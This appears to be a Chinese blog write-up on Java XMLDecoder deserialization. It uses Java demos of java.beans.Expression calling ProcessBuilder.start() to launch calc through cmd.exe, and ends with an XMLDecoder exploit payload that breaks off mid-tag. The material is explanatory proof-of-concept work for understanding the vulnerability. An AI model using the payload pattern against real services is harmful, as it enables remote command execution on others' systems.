XMLDecoder反序列化漏洞底层
这里我主要是看一下最后的执行是怎么样的，也就是Expression类的使用。XMLDecoder在解析XML中的对象和方法调用元素时，最终会构造Expression并调用getValue()，通过反射执行指定的方法；因此不可信来源的XML不应该交给XMLDecoder解析。
import java.beans.Expression;
/**
 * Reproduces, without any XML, the reflective calls that the surrounding write-up
 * identifies as the last step of {@code java.beans.XMLDecoder} processing: an
 * {@link Expression} built from a target object, a method name and an argument array,
 * evaluated with {@code getValue()}.
 *
 * <p>Both variants end in {@code ProcessBuilder.start()}, so running this class spawns
 * a child process from the JVM. That is the practical reason XMLDecoder must only be
 * given trusted input: the document chooses the class, the method and the arguments,
 * and XMLDecoder offers no allowlist. On the detection side, the visible artefact is
 * the Java process creating {@code cmd.exe} / {@code calc} as a child.
 */
public class test {

    /** Runs both demonstrations in order. */
    public static void main(String[] args) throws Exception {
        Parameter();   // method call that takes an argument
        NoParameter(); // method call that takes no argument
    }

    /**
     * Configures an empty {@link ProcessBuilder} reflectively through
     * {@code command(String[])} and then starts it, both via {@link Expression}.
     *
     * @throws Exception whatever {@code Expression.getValue()} propagates
     */
    public static void Parameter() throws Exception {
        ProcessBuilder emptyBuilder = new ProcessBuilder();
        String[] commandLine = {"calc"};

        // The String[] is wrapped in an Object[] so that it is passed as ONE argument
        // to command(...), not spread out as several.
        Expression configure =
                new Expression(emptyBuilder, "command", new Object[]{commandLine});

        // command(...) returns the builder itself, so this is the configured builder.
        Object configuredBuilder = configure.getValue();

        // Second reflective hop: invoke start() with an empty argument list.
        Expression launch = new Expression(configuredBuilder, "start", new Object[0]);
        launch.getValue();

        // Why the plain-reflection variant below cannot work: Class.newInstance() can
        // only call a no-argument constructor, and ProcessBuilder does not have one.
        // Class<?> aClass = configuredBuilder.getClass();
        // Object o = aClass.newInstance();
        // Method start = aClass.getMethod("start");
        // start.invoke(o);
    }

    /**
     * Builds a fully configured {@link ProcessBuilder} through its constructor and uses a
     * single {@link Expression} to invoke {@code start()}. Failures are printed, not rethrown.
     */
    public static void NoParameter() {
        ProcessBuilder readyBuilder =
                new ProcessBuilder(new String[]{"cmd.exe", "/c", "calc"});
        Expression launch = new Expression(readyBuilder, "start", new Object[0]);
        try {
            launch.getValue();
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}
通过下面的测试例子，可以看出Expression是如何根据方法名和参数数组来匹配并调用方法的。
/**
 * Harmless target class for experimenting with {@code java.beans.Expression}: each
 * method only prints a marker, so it is easy to see which one was resolved.
 */
public class cmd {

    /** Zero-argument target; prints the "called without arguments" marker. */
    public void Noparameter() {
        announce("无参数调用....");
    }

    /**
     * One-argument target; prints the "called with arguments" marker.
     *
     * @param obj the argument array; it is not read
     */
    public void Parameter(Object[] obj) {
        announce("有参数调用....");
    }

    /** Writes one marker line to standard output. */
    private static void announce(String marker) {
        System.out.println(marker);
    }
}
import java.beans.Expression;
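/**
 * Shows how {@link Expression} pairs a method name with an argument array, using the
 * print-only {@code cmd} class as the target.
 *
 * <p>The original listing assigned the argument array three times in a row, so only the
 * last value (an empty array) was used. Combined with the method name
 * {@code "Parameter"}, no zero-argument method matched and {@code getValue()} failed with
 * {@code NoSuchMethodException}. The two working pairings are now run explicitly.
 */
public class test1 {

    /**
     * Invokes {@code cmd.Parameter(Object[])} and {@code cmd.Noparameter()} through
     * {@link Expression}.
     *
     * @throws Exception whatever {@code Expression.getValue()} propagates
     */
    public static void main(String[] args) throws Exception {
        Object target = new cmd();

        // One-parameter case. Each element of the outer array is one argument, so an
        // Object[] parameter must itself be wrapped in an Object[]. Passing
        // {"233333"} directly is resolved as a single String argument, which does not
        // match Parameter(Object[]).
        Object[] payload = new Object[]{"233333"};
        Expression withArgument =
                new Expression(target, "Parameter", new Object[]{payload});
        withArgument.getValue();

        // Zero-parameter case: an empty argument array selects Noparameter().
        Expression withoutArgument =
                new Expression(target, "Noparameter", new Object[]{});
        withoutArgument.getValue();
    }
}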
并且给出了一些exp。
<? xml version="1.0" encoding="UTF-8" ?>
<java>
<object class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>cmd.exe</string>
</void>
<void index="1">
<string>/c</string>
</void>
<void index="2">
<string>calc</str